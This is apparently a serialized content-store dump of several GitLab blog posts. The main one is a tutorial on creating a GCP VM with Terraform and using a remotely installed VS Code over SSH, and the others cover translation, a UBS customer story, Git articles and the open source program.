You can watch the recording:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/LJ9oSSx0qyY\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Where do we need help?\n\nAs you can see from the screenshot below, GitLab is almost fully translated into several languages, such as Chinese (both Simplifed and Traditional), French, German, Filipino, Brazilian Portuguese, Ukrainian, etc. However, many languages are in early stages, with a lot of translation left to be done and may also need [proofreaders](https://docs.gitlab.com/ee/development/i18n/proofreader.html) to help review and approve translations. You can find steps to becoming a proofreader also outlined in [the proofreader documentation](https://docs.gitlab.com/ee/development/i18n/proofreader.html#become-a-proofreader).\n\n![GitLab translation status](https://about.gitlab.com/images/blogimages/translation-blog/gitlab_translation_status.png){: .shadow.medium.center}\n\nEven if a language is fully translated today, new phrases are added all the time, so we welcome new contributors across all languages. 
If you have any questions as you get started on [translate.gitlab.com](https://translate.gitlab.com/), you can post questions on the [Crowdin discussions forum](https://translate.gitlab.com/project/gitlab-ee/discussions), and you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9,708],{"slug":5003,"featured":6,"template":689},"translating-gitlab","content:en-us:blog:translating-gitlab.yml","Translating Gitlab","en-us/blog/translating-gitlab.yml","en-us/blog/translating-gitlab",{"_path":5009,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5010,"content":5015,"config":5021,"_id":5023,"_type":14,"title":5024,"_source":16,"_file":5025,"_stem":5026,"_extension":19},"/en-us/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access",{"title":5011,"description":5012,"ogTitle":5011,"ogDescription":5012,"noIndex":6,"ogImage":2342,"ogUrl":5013,"ogSiteName":673,"ogType":674,"canonicalUrls":5013,"schema":5014},"Tutorial: Install VS Code on a cloud provider VM and set up remote access","Learn how to automate the installation of VS Code on a VM running on a cloud provider and how to access it from your local laptop.","https://about.gitlab.com/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Tutorial: Install VS Code on a cloud provider VM and set up remote access\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Cesar Saavedra\"}],\n        \"datePublished\": \"2024-05-06\",\n      }",{"title":5011,"description":5012,"authors":5016,"heroImage":2342,"date":5018,"body":5019,"category":801,"tags":5020},[5017],"Cesar Saavedra","2024-05-06","DevSecOps teams can sometimes find they need to run an instance of Visual Studio 
Code (VS Code) remotely for team members to share when they don't have enough local resources. However, installing, running, and using VS Code on a remote virtual machine (VM) via a cloud provider can be a complex process full of pitfalls and false starts. This tutorial covers how to automate the installation of VS Code on a VM running on a cloud provider.\n\nThis approach involves two separate GitLab projects, each with its own pipeline. The first one uses Terraform to instantiate a virtual machine in GCP running Linux Debian. The second one installs VS Code on the newly instantiated VM. Lastly, we provide a procedure on how to set up your local Mac laptop to connect and use the VS Code instance installed on the remote VM.\n\n## Create a Debian Linux distribution VM on GCP\n\nHere are the steps to create a Debian Linux distribution VM on GCP.\n\n### Prerequisites\n\n1. A GCP account. If you don't have one, please [create one](https://cloud.google.com/free?hl=en).\n2. A GitLab account on [gitlab.com](https://gitlab.com/users/sign_in)\n\n**Note:** This installation uses:\n\n- Debian 5.10.205-2 (2023-12-31) x86_64 GNU/Linux, a.k.a Debian 11\n\n### Create a service account and download its key\n\nBefore you create the first GitLab project, you need to create a service account in GCP and then generate and download a key. You will need this key so that your GitLab pipelines can communicate to GCP and the GitLab API.\n\n1. To authenticate GCP with GitLab, sign in to your GCP account and create a [GCP service account](https://cloud.google.com/docs/authentication#service-accounts) with the following roles:\n- `Compute Network Admin`\n- `Compute Admin`\n- `Service Account User`\n- `Service Account Admin`\n- `Security Admin`\n\n3. Download the JSON file with the service account key you created in the previous step.\n4. 
On your computer, encode the JSON file to `base64` (replace `/path/to/sa-key.json` to the path where your key is located):\n\n   ```shell\n   base64 -i /path/to/sa-key.json | tr -d \\\\n\n   ```\n\n**NOTE:** Save the output of this command. You will use it later as the value for the `BASE64_GOOGLE_CREDENTIALS` environment variable.\n\n### Configure your GitLab project\n\nNext, you need to create and configure the first GitLab project.\n\n1. Create a group in your GitLab workspace and name it `gcpvmlinuxvscode`.\n\n1. Inside your newly created group, clone the following project:\n\n   ```shell\n   git@gitlab.com:tech-marketing/sandbox/gcpvmlinuxvscode/gcpvmlnxsetup.git\n   ```\n\n1. Drill into your newly cloned project, `gcpvmlnxsetup`, and set up the following CI/CD variables to configure it:\n   1. On the left sidebar, select **Settings > CI/CD**.\n   1. Expand **Variables**.\n   1. Set the variable `BASE64_GOOGLE_CREDENTIALS` to the `base64` encoded JSON file you created in the previous section.\n   1. Set the variable `TF_VAR_gcp_project` to your GCP `project` ID.\n   1. Set the variable `TF_VAR_gcp_region` to your GCP `region` ID, e.g. us-east1, which is also its default value.\n   1. Set the variable `TF_VAR_gcp_zone` to your GCP `zone` ID, e.g. us-east1-d, which is also its default value.\n   1. Set the variable `TF_VAR_machine_type` to the GCP `machine type` ID, e.g. e2-standard-2, which is also its default value.\n   1. Set the variable `TF_VAR_gcp_vmname` to the GCP `vm name` you want to give the VM, e.g. my-test-vm, which is also its default value.\n\n**Note:** We have followed a minimalist approach to set up this VM. 
If you would like to customize the VM further, please refer to the [Google Terraform provider](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) and the [Google Compute Instance Terraform provider](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/compute_instance) documentation for additional resource options.\n\n### Provision your VM\n\nAfter configuring your project, manually trigger the provisioning of your VM as follows:\n\n1. On the left sidebar, go to **Build > Pipelines**.\n1. Next to **Play** (**{play}**), select the dropdown list icon (**{chevron-lg-down}**).\n1. Select **Deploy** to manually trigger the deployment job.\n\nWhen the pipeline finishes successfully, you can see your new VM on GCP:\n\n- Check it on your [GCP console's VM instances list](https://console.cloud.google.com/compute/instances).\n\n### Remove the VM\n\n**Important note:** Only run the cleanup job when you no longer need the GCP VM and/or the VS Code that you installed in it.\n\nA manual cleanup job is included in your pipeline by default. To remove all created resources:\n\n1. On the left sidebar, select **Build > Pipelines** and select the most recent pipeline.\n1. For the `destroy` job, select **Play** (**{play}**).\n\n## Install and set up VS Code on a GCP VM\n\nPerform the steps in this section only after you have successfully finished the previous sections above. In this section, you will create the second GitLab project that will install VS Code and its dependencies on the running VM on GCP.\n\n### Prerequisites\n\n1. A provisioned GCP VM. 
We covered this in the previous sections.\n\n**Note:** This installation uses:\n\n- VS Code Version 1.85.2\n\n### Configure your project\n\n**Note:** Since you will be using the `ssh` command multiple times on your laptop, we strongly suggest that you make a backup copy of your laptop local directory `$HOME/.ssh` before continuing.\n\nNext, you need to create and configure the second GitLab project.\n\n1. Head over to your GitLab group `gcpvmlinuxvscode`, which you created at the beginning of this post.\n\n1. Inside group, `gcpvmlinuxvscode`, clone the following project:\n\n   ```shell\n   git@gitlab.com:tech-marketing/sandbox/gcpvmlinuxvscode/vscvmsetup.git\n   ```\n\n1. Drill into your newly cloned project, `vscvmsetup` and set up the following CI/CD variables to configure it:\n   1. On the left sidebar, select **Settings > CI/CD**.\n   1. Expand **Variables**.\n   1. Set the variable `BASE64_GOOGLE_CREDENTIALS` to the `base64` encoded JSON file you created in project `gcpvmlnxvsc`. You can copy this value from the variable with the same name in project `gcpvmlnxvsc`.\n   1. Set the variable `gcp_project` to your GCP `project` ID.\n   1. Set the variable `gcp_vmname` to your GCP `region` ID, e.g. us-east1.\n   1. Set the variable `gcp_zone` to your GCP `zone` ID, e.g. us-east1-d.\n   1. Set the variable `vm_pwd` to the password that you will use to ssh to the VM.\n   1. Set the variable `gcp_vm_username` to the first portion (before the \"@\" sign) of the email associated to your GCP account, which should be your GitLab email.\n\n### Run the project pipeline\n\nAfter configuring the second GitLab project, manually trigger the provisioning of VS Code and its dependencies to the GCP VM as follows:\n\n1. On the left sidebar, select **Build > Pipelines** and click on the button **Run Pipeline**. On the next screen, click on the button **Run pipeline**.\n\n    The pipeline will:\n\n    - install `xauth` on the virtual machine. 
This is needed for effective X11 communication between your local desktop and the VM \n    - install `git` on the VM\n    - install `Visual Studio Code` on the VM.\n\n2. At this point, you can wait until the pipeline successfully completes. If you don't want to wait, you can continue to do the first step of the next section. However, you must ensure the pipeline has successfully completed before you can perform Step 2 of the next section.\n\n### Connect to your VM from your local Mac laptop\n\nNow that you have an instance of VS Code running on a Linux VM on GCP, you need to configure your Mac laptop to be able to act as a client to the remote VM. Follow these steps:\n\n1. To connect to the remote VS Code from your Mac, you must first install `XQuartz` on your Mac. You can execute the following command on your Mac to install it:\n\n```\nbrew install xquartz\n```\nOr, you can follow the instructions from the following [tutorial](https://und.edu/research/computational-research-center/tutorials/mac-x11.html) from the University of North Dakota.\n\nAfter the pipeline for project `vscvmsetup` successfully executes to completion (pipeline you manually executed in the previous section), you can connect to the remote VS Code as follows:\n\n2. Launch `XQuartz` on your Mac (it should be located in your Applications folder). Its launching should open up an `xterm` on your Mac. If it does not, then you can select **Applications > Terminal** from the `XQuartz` top menu. \n3. On the `xterm`, enter the following command:\n\n```\ngcloud compute ssh --zone \"[GCP zone]\" \"[name of your VM]\" --project \"[GCP project]\" --ssh-flag=\"-Y\"\n```\nWhere:\n\n- `[VM name]` is the name of the VM you created in project `gcpvmlnxvsc`. Its value should be the same as the `gcp_project` variable.\n- `[GCP zone]` is the zone where the VM is running. Its value should be the same as the `gcp_vmname` variable.\n- `[GCP project]` is the name of your GCP project assigned name. 
Its value should be the same as the `gcp_project` variable.\n\n***Note: If you have not installed the Google Cloud CLI, please do so by following the [Google documentation](https://cloud.google.com/sdk/docs/install).***\n\n4. If you have not used SSH on your Mac before, you may not have a `.ssh` in your `HOME` directory. If this is the case, you will be asked if you would like to continue with the creation of this directory. Answer **Y**.\n\n5. Next, you will be asked to enter the same password twice to generate a public/private key. Enter the same password you used when defining the variable `vm_pwd` in the required configuration above.\n\n6. Once the SSH key is done propagating, you will need to enter the password again two times to log in to the VM.\n\n7. You should now be logged in to the VM.\n\n### Create a personal access token\n\nThe assumption here is that you already have a GitLab project that you would want to open from and work on the remote VS Code. To do this, you will need to clone your GitLab project from the VM. First, you will be using a personal access token (PAT) to clone your project.\n\n1. Head over to your GitLab project (the one that you'd like to open from the remote VS Code).\n2. From your GitLab project, create a [PAT](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html#create-a-personal-access-token), name it `pat-gcpvm` and ensure that it has the following scopes: `read_repository`, `write_repository`, `read_registry`, `write_registry`, and `ai_features`\n3. Save the generated PAT somewhere safe; you will need it later.\n\n### Clone the repository\n\n1. 
On your local Mac, from the `xterm` where you are logged on to the remote VM, enter the following command:\n\n```\ngit clone https://[your GitLab username]:[personal_access_token]@gitlab.com/[GitLab project name].git \n```\n\nWhere:\n\n- `[your GitLab username]` is your GitLab handle.\n- `[personal_access_token]` is the PAT you created in the previous section.\n- `[GitLab project name]` is the name of the project that contains the GitLab Code Suggestions test cases.\n\n## Launch Visual Studio Code\n\n1. From the `xterm` where you are logged in to the VM, enter the following command:\n\n```\ncode\n```\n\nWait for a few seconds and Visual Studio Code will appear on your Mac screen.\n\n2. From the VS Code menu, select **File > Open Folder...**\n3. In the File chooser, select the top-level directory of the GitLab project you cloned in the previous section.\n\nThat's it! You're ready to start working on your cloned GitLab project using the VS Code that you installed on a remote Linux-based VM.\n\n### Troubleshooting\n\nWhile using the remotely installed VS Code from your local Mac, you may encounter a few issues. In this section, we provide guidance on how to mitigate them.\n\n#### Keyboard keys not mapped correctly\n\nIf, while running VS Code, you are having issues with your keyboard keys not being mapped correctly, e.g. letter e is backspace, letter r is tab, letter s is clear line, etc., do the following:\n\n1. In VS Code, select **File > Preferences > Settings**.\n1. Search for \"keyboard\". If having issues with the letter e, then search for \"board\". Click on the \"Keyboard\" entry under \"Application.\"\n1. Ensure that the Keyboard Dispatch is set to \"keyCode.\"\n1. Restart VS Code.\n1. 
If you need further help, this is a good resource for [keyboard problems](https://github.com/microsoft/vscode/wiki/Keybinding-Issues#troubleshoot-linux-keybindings).\n\n#### Error loading webview: Error\n\nIf while running VS Code, you get a message saying:\n\n\"Error loading webview: Error: Could not register service worker: InvalidStateError: Failed to register a ServiceWorker: The document is in an invalid state.\"\n\n1. Exit VS Code and then enter this cmd from the `xterm` window:\n\n`killall code`\n\nYou may need to execute this command two or three times in a row to kill all VS Code processes.\n\n2. Ensure that all VS Code-related processes are gone by entering the following command from the `xterm` window:\n\n`ps -ef | grep code`\n\n3. Once all the VS Code-related processes are gone, restart VS Code by entering the following command from the `xterm` window:\n\n`code`\n\n#### Some useful commands to debug SSH\n\nHere are some useful commands to run on the VM that can help you debug SSH issues:\n\n1. To get the status, location and latest event of sshd:\n\n`sudo systemctl status ssh`\n\n2. To see the log of sshd:\n\n`journalctl -b -a -u ssh`\n\n3. To restart the SSH daemon:\n\n`sudo systemctl restart ssh.service`\n\nOr\n\n`sudo systemctl restart ssh`\n\n4. To start a root shell:\n\n`sudo -s`\n\n## Get started\n\nThis article described how to:\n- instantiate a Linux-based VM on GCP\n- install VS Code and dependencies on the remote VM\n- clone an existing GitLab project of yours in the remote VM\n- open your remotely cloned project from the remotely installed VS Code\n\nAs a result, you can basically use your laptop as a thin client that accesses a remote server, where all the work takes place.\n\n> The automation to get all these parts in place was done by GitLab. 
Sign up for a [free 30-day GitLab Ultimate trial](https://about.gitlab.com/free-trial/) to get started today!",[845,752,9],{"slug":5022,"featured":91,"template":689},"tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access","content:en-us:blog:tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access.yml","Tutorial Install Vs Code On A Cloud Provider Vm And Set Up Remote Access","en-us/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access.yml","en-us/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access",{"_path":5028,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5029,"content":5035,"config":5040,"_id":5042,"_type":14,"title":5043,"_source":16,"_file":5044,"_stem":5045,"_extension":19},"/en-us/blog/ubs-gitlab-devops-platform",{"title":5030,"description":5031,"ogTitle":5030,"ogDescription":5031,"noIndex":6,"ogImage":5032,"ogUrl":5033,"ogSiteName":673,"ogType":674,"canonicalUrls":5033,"schema":5034},"How UBS created their own DevOps platform using GitLab","How GitLab helped power more than a million builds in six months on UBS DevCloud.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665839/Blog/Hero%20Images/devops.png","https://about.gitlab.com/blog/ubs-gitlab-devops-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How UBS created their own DevOps platform using GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2021-08-04\",\n      }",{"title":5030,"description":5031,"authors":5036,"heroImage":5032,"date":5037,"body":5038,"category":801,"tags":5039},[927],"2021-08-04","\n\nUBS, the largest truly global wealth manager, uses GitLab to power DevCloud, a single [DevOps platform](/solutions/devops-platform/) that allows for a cloud-based, service-oriented, software development lifecycle.\n\n\"GitLab is a 
fundamental part of DevCloud,\" said [Rick Carey](https://www.bloomberg.com/profile/person/20946258), Group Chief Technology Officer at UBS. \"We wouldn't be able to have that seamless experience without GitLab. It allowed us to pull ahead of many of our competitors, and break down the barriers between coding, testing, and deployment.\"\n\nDuring GitLab Virtual Commit 2021, Rick and [Eric Johnson](/company/team/#edjdev), Chief Technology Officer at GitLab, talked about how building DevCloud on GitLab's DevOps Platform allowed UBS to increase their development velocity, lower their infrastructure costs, and increase collaboration between engineers and non-engineering teams worldwide.\n\n## How engineers used DevCloud to collaborate during UBS Hackathon\n\nThe annual [UBS Hackathon](https://www.ubs.com/global/en/our-firm/what-we-do/technology/2020/hackathon-2020.html), which typically brings together engineers from around the world in one room, went virtual in 2020 due to the COVID-19 pandemic. UBS did a soft launch of the DevCloud platform during the 2020 Hackathon to have a truly global development and seamless team experience among the more than 500 participants dispersed worldwide.\n\n\"It was hard to pick a winner, because nearly every program and team built something absolutely incredible in such a short amount of time,\" said Rick. 
\"They got so much done that even while chatting with each other, they said, 'I can't believe how easy it is to get this done.'\n\nOnce this Hackathon was successful, we knew that we were going to be able to migrate the rest of our engineers to DevCloud.\"\n\n## Open source collaboration benefitted UBS and GitLab\n\n\"I must say it's uncommon in my experience to see such a large organization let alone one in such a compliance-driven industry as finance take on such a large project and deliver it on time,\" Eric said.\n\nRick attributes part of that success to GitLab's commitment to open source collaboration, which allowed UBS to turn to GitLab team members with questions.\n\n\"In an open source model, every time there was a gap, or an issue, or something we just needed your help with, we could reach out to GitLab and say, 'Can we work on this together? Is there a way to improve this?'\", said Rick. \"That's the value, and that's one of the reasons we went with GitLab.\"\n\nIt wasn't a one-way relationship. Eric said that GitLab learned a lot about compliance and risk processes that are unique to the financial sector by collaborating on open source projects with UBS.\n\n\"Collaboration is one of the GitLab's core values – which was key to this project. We set common goals. We're in constant communication, and we're always working together to remove roadblocks. 
Working with UBS's engineers is a truly agile experience,\" said Eric.\n\nGitLab forums have a lot of contributions from UBS team members, and both UBS and GitLab are members of open source communities such as the Fintech Open Source Foundation (FINOS) and Cloud Native Computing Foundation (CNCF).\n\n## How adopting DevCloud paid off for UBS\n\nOne of the key messages for why adopting a single DevOps platform such as GitLab or DevCloud benefits engineering teams is the productivity pay-off – for engineers and non-engineers alike.\n\nSimilar to GitLab, which enables simple asynchronous collaboration between team members, DevCloud was built with engineers in mind but so everyone can contribute. Rick said that one of the best pieces of feedback he got on DevCloud was from someone on the business side of UBS, who wanted to do some development projects but struggled with other tools.\n\n\"He said, 'Oh, that's DevCloud? I love DevCloud,'\" said Rick.\n\nIn the roughly six months since UBS launched DevCloud, there have been more than 12,000 users and more than one million successful builds.\n\n## What's next?\n\nIn June 2021, [GitLab acquired machine learning company UnReview](/press/releases/2021-06-02-gitlab-acquires-unreview-machine-learning-capabilities.html) which has allowed us to improve our machine learning capabilities as part of our DevOps Platform. Eric said that by practicing applied machine learning, specifically for code review, GitLab should be able to balance review workloads across teams to increase efficiency.\n\nKeeping all the DevOps activities in a single application makes it easier to extract insights throughout the software development lifecycle. By adding machine learning to a DevOps Platform such as GitLab or DevCloud, teams can not only derive data from past activities, but start to predict the future.\n\n \"We were very impressed by UBS's development culture,\" said Eric. 
\"It is very complimentary to our own, and we look forward to our continued partnership.\"\n\n## More of a video person?\n\nThis conversation was part of GitLab Virtual Commit 2021. Watch the video below to see the full conversation between Eric and Rick.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/Tof-7fDultw\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[685,9,1036,779],{"slug":5041,"featured":6,"template":689},"ubs-gitlab-devops-platform","content:en-us:blog:ubs-gitlab-devops-platform.yml","Ubs Gitlab Devops Platform","en-us/blog/ubs-gitlab-devops-platform.yml","en-us/blog/ubs-gitlab-devops-platform",{"_path":5047,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5048,"content":5053,"config":5058,"_id":5060,"_type":14,"title":5061,"_source":16,"_file":5062,"_stem":5063,"_extension":19},"/en-us/blog/ultimate-git-guide",{"title":5049,"description":5050,"ogTitle":5049,"ogDescription":5050,"noIndex":6,"ogImage":1069,"ogUrl":5051,"ogSiteName":673,"ogType":674,"canonicalUrls":5051,"schema":5052},"Our ultimate guide to Git","Open source pioneer Git is 15 years old. Here is our guide to making the most of it.","https://about.gitlab.com/blog/ultimate-git-guide","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Our ultimate guide to Git\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-04-20\",\n      }",{"title":5049,"description":5050,"authors":5054,"heroImage":1069,"date":5055,"body":5056,"category":10,"tags":5057},[1273],"2020-04-20","\n\n_Git, a [source code management](/solutions/source-code-management/) tool and arguably the most famous open source software project, turned 15 in April 2020. 
That’s a milestone no matter how you look at it, and not surprisingly our team has a lot to say about Git. From a look back at the past to newbie-friendly explanations, we’ve pulled together the ultimate guide to Git (as told by GitLab)._\n\n## Meet Git\n\nIf you’re just getting started with software development, you’ll have questions. Luckily, we have answers including background on developer Linus Torvalds in [\"A beginner’s guide to Git\"](/blog/beginner-git-guide/).\n\n![Linus Torvalds](https://about.gitlab.com/images/blogimages/linustorvalds.png){: .shadow.small.center}\n\nThe godfather of Git, Linus Torvalds.\n{: .note.text-center}\n\n## Get more out of Git\n\nWe all spend a ton of time working with Git so it makes sense to polish up your workflow so it shines. We’ve [got the lowdown](/blog/15-git-tips-improve-workflow/) on Git blame, .gitignore, how to pull frequently, and more.\n\n## Missed Git Merge?\n\nNot everyone was lucky enough to attend the actual, in-person Git birthday party. Here’s our [first-person account](/blog/git-merge-fifteen-year-git-party/) of the festivities, complete with lots of pictures.\n\n![birthday balloons](https://about.gitlab.com/images/blogimages/balloons.jpg){: .shadow.small.center}\n\n## Why Git flow doesn’t always go with the flow\n\nYou can have too much of a good thing, and if you doubt that, perhaps it’s because you haven’t yet encountered Git flow. Although designed to streamline development it ends up creating extra effort – too many branches and too much task switching. Never fear, though, [we have a solution](/blog/what-is-gitlab-flow/).\n\n## Git goes (really) big\n\nWhen Git was invented 15 years ago, video streaming (and gaming) weren’t even on the horizon. Git can handle those huge files but there’s one hiccup: You can’t just download the one you need, Git insists you download all of them. Enter Git Partial Clone which speeds up the process so you can just grab the file you need. 
[Here’s how it works](/blog/partial-clone-for-massive-repositories/).\n\n## GitLab and GitHub on Git\n\nOur senior developer evangelist [Brendan O’Leary](/company/team/#brendan) did a bit of a point counter-point about Git and its past and future with GitHub’s distinguished software engineer [Jeff King](https://www.linkedin.com/in/pefflinkedin/) on [infoq.com](https://www.infoq.com/news/2020/04/git-fifteen-anniversary-qa/).\n\n## Never say never\n\nBrendan also admitted that 15 years ago, he was never ever going to use Git. Ahem. Feel free to enjoy [his mea culpa](https://www.computerweekly.com/blog/Open-Source-Insider/GitLab-guru-15-years-later-were-still-learning).\n\n## Dive into GitOps\n\nYou’ve heard the term, now is the time to understand what [GitOps](/solutions/gitops/) means and how it can work – well – in real world applications. Here’s what you need to know about [continuous delivery to production](/blog/why-gitops-should-be-workflow-of-choice/).\n\nImage by [Adi Gold](https://unsplash.com/@adigold1) on [Unsplash](https://www.unsplash.com)\n{: .note}\n",[751,9,1099],{"slug":5059,"featured":6,"template":689},"ultimate-git-guide","content:en-us:blog:ultimate-git-guide.yml","Ultimate Git Guide","en-us/blog/ultimate-git-guide.yml","en-us/blog/ultimate-git-guide",{"_path":5065,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5066,"content":5072,"config":5078,"_id":5080,"_type":14,"title":5081,"_source":16,"_file":5082,"_stem":5083,"_extension":19},"/en-us/blog/ultimate-perks-for-open-source-projects",{"title":5067,"description":5068,"ogTitle":5067,"ogDescription":5068,"noIndex":6,"ogImage":5069,"ogUrl":5070,"ogSiteName":673,"ogType":674,"canonicalUrls":5070,"schema":5071},"Public open source projects are eligible for Ultimate tier features","GitLab's Open Source Program offers top-tier functionality and 50,000 CI pipeline minutes, for free. 
Learn more about applying.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667457/Blog/Hero%20Images/open_source_program_blog_image.jpg","https://about.gitlab.com/blog/ultimate-perks-for-open-source-projects","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Public open source projects are eligible for Ultimate tier features\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Orit Golowinski\"}],\n        \"datePublished\": \"2022-02-04\",\n      }",{"title":5067,"description":5068,"authors":5073,"heroImage":5069,"date":5075,"body":5076,"category":930,"tags":5077},[5074],"Orit Golowinski","2022-02-04","\n> **2022-07-28 UPDATE:** As of 2022-07-01, all public open source projects on the Free tier have to apply to the Open Source program to continue receiving GitLab Ultimate benefits. In-app notifications informing impacted users of the change were active from 2022-04-18 through 2022-07-01. Please refer to the [FAQ](/pricing/faq-efficient-free-tier/#public-projects-on-gitlab-saas-free-tier) for more details.\n\nGitLab believes in a world where everyone can contribute and we like to support those who share our mission.\n\nGitLab exists today in large part thanks to the work of hundreds of thousands of open source contributors around the world. To give back to this community, the [GitLab for Open Source Program](/solutions/open-source/) was created to help open source teams be more efficient, secure, and productive by allowing them to use GitLab’s [top tier](/pricing/) capabilities.\n\nOpen source organizations have to meet the program requirements and actively apply in order to qualify. 
\n\nRequirements include:\n\n* **OSI-approved open source license**: All of the code you host in this GitLab group must be published under [OSI-approved open source licenses](https://opensource.org/licenses/category)\n* **Not seeking profit**: Your organization must not seek to make a profit through services or by charging for higher tiers. Accepting donations to sustain your efforts is ok. [Read more about this requirement here](/handbook/marketing/developer-relations/community-programs/opensource-program/#who-qualifies-for-the-gitlab-for-open-source-program).\n* Publicly visible: Your GitLab.com group or self-managed instance and your source code must be [publicly visible and publicly available](https://docs.gitlab.com/ee/user/public_access.html).\n\n[Learn more and apply](/solutions/open-source/join/) to the GitLab for Open Source Program.\n\n**Note**: Newly created public projects will no longer automatically receive the Ultimate tier benefits as of 2022-02-17, more details in [this FAQ entry](/pricing/faq-efficient-free-tier/#public-projects-on-gitlab-saas-free-tier). In order to receive the benefits, you will need to [apply](#how-to-apply) to the GitLab for Open Source Program.\n\n## Why apply to the GitLab for Open Source Program?\n\nThe GitLab for Open Source Program gives access to unlimited seats per license to features of [GitLab Ultimate](/pricing/ultimate/) (SaaS or Self-Managed), including 50,000 CI/CD minutes, for free to qualifying open source projects. GitLab Ultimate includes features that allow organization-wide security, compliance and planning. 
Some key features include:\n\n- [Multi-level Epics](https://docs.gitlab.com/ee/user/group/epics/)\n- [Portfolio-level Roadmaps](https://docs.gitlab.com/ee/user/group/roadmap/)\n- [Requirements Management](/direction/plan/#requirements-management)\n- [Compliance pipeline configuration](https://docs.gitlab.com/ee/user/project/settings/#compliance-pipeline-configuration)\n- [Chain of custody report](https://docs.gitlab.com/ee/user/compliance/compliance_report/#chain-of-custody-report)\n- [Vulnerability Database](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/#contributing-to-the-vulnerability-database)\n- [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/)\n- and much more...\n\nTo see a complete list of features, see our\n[Feature Comparison between tiers](/pricing/feature-comparison/) page. \n\n* Free top-tier accounts do not include support. However, you can purchase [support](/support/) for 95% off, at $4.95 per user per month.\n* Your program membership needs to be renewed annually. If you do not renew, [your account will be downgraded](/pricing/licensing-faq/#what-happens-when-my-subscription-is-about-to-expire-or-has-expired).\n* Acceptance into the GitLab for Open Source Program is at GitLab’s sole discretion, and we reserve the right to terminate the Program, or change the [Program requirements](/solutions/open-source/join/#requirements) at any time.\n\nIf you have any additional questions regarding this program, feel free to reach us at [opensource@gitlab.com](mailto:opensource@gitlab.com).\n\n## How to apply\n\n1. Set up a GitLab account. You’ll need to have a GitLab group already set up for your open source project or organization through a Free account or Free Trial. For help setting up a GitLab group, please see the relevant [FAQ](/solutions/open-source/join/#faqs). If you're considering a migration, you do not need to have finished the migration before applying to our program. 
You will need at least one project (repo) set up under your GitLab group to comply with our requirements.\n1. Take screenshots. During the application process, you’ll need to provide 3 screenshots of your project. We suggest taking them in advance, since you’ll need to submit them on page two of the application form.\n1. Fill out the [form](/solutions/open-source/join/#application) and submit it. \n\nApplications are reviewed and a response to your request can be expected within 10 business days. You may be asked to provide additional information.\n\nCover image by [Clay Banks](https://unsplash.com/photos/N3SsG7xR-Dg) on [Unsplash](https://unsplash.com)\n{: .note}\n",[9,708,685],{"slug":5079,"featured":6,"template":689},"ultimate-perks-for-open-source-projects","content:en-us:blog:ultimate-perks-for-open-source-projects.yml","Ultimate Perks For Open Source Projects","en-us/blog/ultimate-perks-for-open-source-projects.yml","en-us/blog/ultimate-perks-for-open-source-projects",{"_path":5085,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5086,"content":5092,"config":5098,"_id":5100,"_type":14,"title":5101,"_source":16,"_file":5102,"_stem":5103,"_extension":19},"/en-us/blog/unifylogsmetrics",{"title":5087,"description":5088,"ogTitle":5087,"ogDescription":5088,"noIndex":6,"ogImage":5089,"ogUrl":5090,"ogSiteName":673,"ogType":674,"canonicalUrls":5090,"schema":5091},"How to integrate operation logs and metrics in GitLab","We've added Elasticsearch to our monitoring solution so you can see all your logs and metrics in one view. 
